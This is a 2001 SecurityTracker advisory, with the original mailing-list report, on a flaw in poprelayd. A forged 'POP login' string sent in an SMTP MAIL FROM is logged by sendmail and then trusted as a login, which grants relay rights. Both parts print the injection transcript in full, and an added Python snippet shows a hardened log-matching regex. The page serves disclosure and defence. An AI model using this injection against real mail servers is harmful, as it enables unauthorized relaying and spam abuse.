SecurityTracker.com
Category:  Application (E-mail Server)  >  Poprelayd Vendors:  [Multiple Authors/Vendors]
Poprelayd E-mail Relaying Security Utility Lets Remote Users Relay Mail via SMTP Without Authenticating
Date:  Jul 4 2001 20:14 (UTC/GMT)
Impact:  Host/resource access via network
Exploit Included:  Yes  
Description:  A vulnerability has been reported in poprelayd that allows remote users to bypass its authentication check and send relayed mail without authenticating.

Poprelayd is a program that monitors POP3 and IMAP user authentication logs (/var/log/maillog) and allows hosts that have successfully authenticated to relay mail via sendmail for a short period of time.

The syslog string searched by the script is in the following form for the qpop server (the character class is restored here to [0-9\.]+, which the quoted exploit string relies on):

/POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9\.]+)/

On some servers, it is reportedly possible for a remote user to insert a crafted string into the mail log that fools the poprelayd utility into thinking that a particular host IP address has successfully authenticated. This allows that host IP address to send relayed SMTP mail.

An exploit transcript follows:

telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"...Domain name required

At this point, the IP address 66.66.66.66 can use the SMTP relay.
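As an added illustration (not part of the advisory or of poprelayd's own code), the loose match described above is placed beside a hardened one and both are run over two constructed maillog lines: a genuine qpopper login record and a sendmail rejection line that carries the injected string. The syslog layout and the "popper" program tag are assumptions; adjust them to the POP daemon actually in use.

```python
import re
from typing import Optional

# Constructed sample syslog lines (not taken from the original report).
GENUINE_LINE = ('Jul  3 18:59:01 dumbcobalt popper[1234]: POP login by user '
                '"admin" at (client.example.net) 10.0.0.5')
INJECTED_LINE = ('Jul  3 19:02:44 dumbcobalt sendmail[5678]: f63H2i05678: '
                 'from="POP login by user "admin" at (66.66.66.66) 66.66.66.66'
                 '@linux.org", size=0, class=0, relay=attacker [203.0.113.9], '
                 'reject=553 Domain name required')

# The pattern as poprelayd used it (character class restored to [0-9\.]+):
# it matches anywhere in the line and ignores which daemon wrote the line.
NAIVE_RE = re.compile(r'POP login by user "[\-\_\w]+" at \(.+\) ([0-9\.]+)')

# Hardened pattern: anchored at the syslog prefix, accepts only lines written
# by the POP daemon (program tag "popper" is an assumption), and requires a
# well-formed IPv4 address to end the line, so a quoted copy followed by
# sendmail's own fields (size=, class=, reject=) cannot match.
SYSLOG_PREFIX = r'^[A-Z][a-z]{2} {1,2}\d{1,2} \d\d:\d\d:\d\d \S+ '
STRICT_RE = re.compile(
    SYSLOG_PREFIX
    + r'popper\[\d+\]: POP login by user "[\-\_\w]+" at \([^)]*\) '
    + r'(\d{1,3}(?:\.\d{1,3}){3})$'
)

def naive_extract(line: str) -> Optional[str]:
    """Return the IP the loose match would whitelist, or None."""
    m = NAIVE_RE.search(line)
    return m.group(1) if m else None

def strict_extract(line: str) -> Optional[str]:
    """Return the IP only when the line is a genuine POP-daemon login record."""
    m = STRICT_RE.match(line)
    if not m:
        return None
    ip = m.group(1)
    # Reject octets that the digit-count check alone lets through (e.g. 999).
    if any(int(octet) > 255 for octet in ip.split('.')):
        return None
    return ip

def relay_allowlist(lines, extractor):
    """Set of IPs a poprelayd-style scan would grant relay rights to."""
    return {ip for ip in map(extractor, lines) if ip}

if __name__ == '__main__':
    log = [GENUINE_LINE, INJECTED_LINE]
    print('naive :', sorted(relay_allowlist(log, naive_extract)))
    print('strict:', sorted(relay_allowlist(log, strict_extract)))
```

With the loose pattern the forged sendmail line grants 66.66.66.66 relay rights; the anchored pattern admits only the genuine POP daemon record.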

Impact:  A remote user can send mail via the SMTP relay without authenticating.
Solution:  No solution was available at the time of this entry.
Vendor URL:  sourceforge.net/projects/poprelay
Cause:  State error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  Andrea Barisani <lcars@infis.univ.trieste.it>
Message History:   None.


 Source Message Contents

Date:  Tue, 3 Jul 2001 19:05:10 +0200 (CEST)
From:  Andrea Barisani <lcars@infis.univ.trieste.it>
Subject:  poprelayd and sendmail relay authentication problem (Cobalt Raq3)

 

Hi to all,

Poprelayd is a simple script that scans /var/log/maillog for valid POP
logins and updates a hash db used by sendmail to permit relaying for
those valid POP users; this method is called "Pop-before-smtp".

The syslog string searched by the script is in this form for the qpop
server:

/POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9\.]+)/

On some Cobalt RaQ3 servers (with the poprelayd add-on package installed),
and in general on any system running the poprelayd script with sendmail, it is
possible to "inject" this string into the syslog using sendmail logging. So
anyone can insert a fake string with his own IP which will be parsed by
poprelayd and that will permit the use of sendmail as a relay.

On cobalts the presence of poprelayd is revealed by the modified sendmail
relaying denied message "Relaying denied. Please check your mail first." 

Example:

telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"...Domain name required

Now the IP 66.66.66.66 can relay :)

in fact, on dumbcobalt:

in /var/log/maillog

...reject=533 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org", size=0, class=0 ....etc etc...

[root@dumbcobalt /]# /usr/sbin/poprelayd -p
66.66.66.66 	7

;-)

Bye

------------------------------------------------------------
INFIS Network Administrator & Security Officer
Department of Physics       - University of Trieste
lcars@infis.univ.trieste.it - PGP Key 0x8E21FE82
------------------------------------------------------------
"How would you know I'm mad?" said Alice.
"You must be," said the Cat, "or you wouldn't have come here."
------------------------------------------------------------

Copyright 2001, SecurityGlobal.net LLC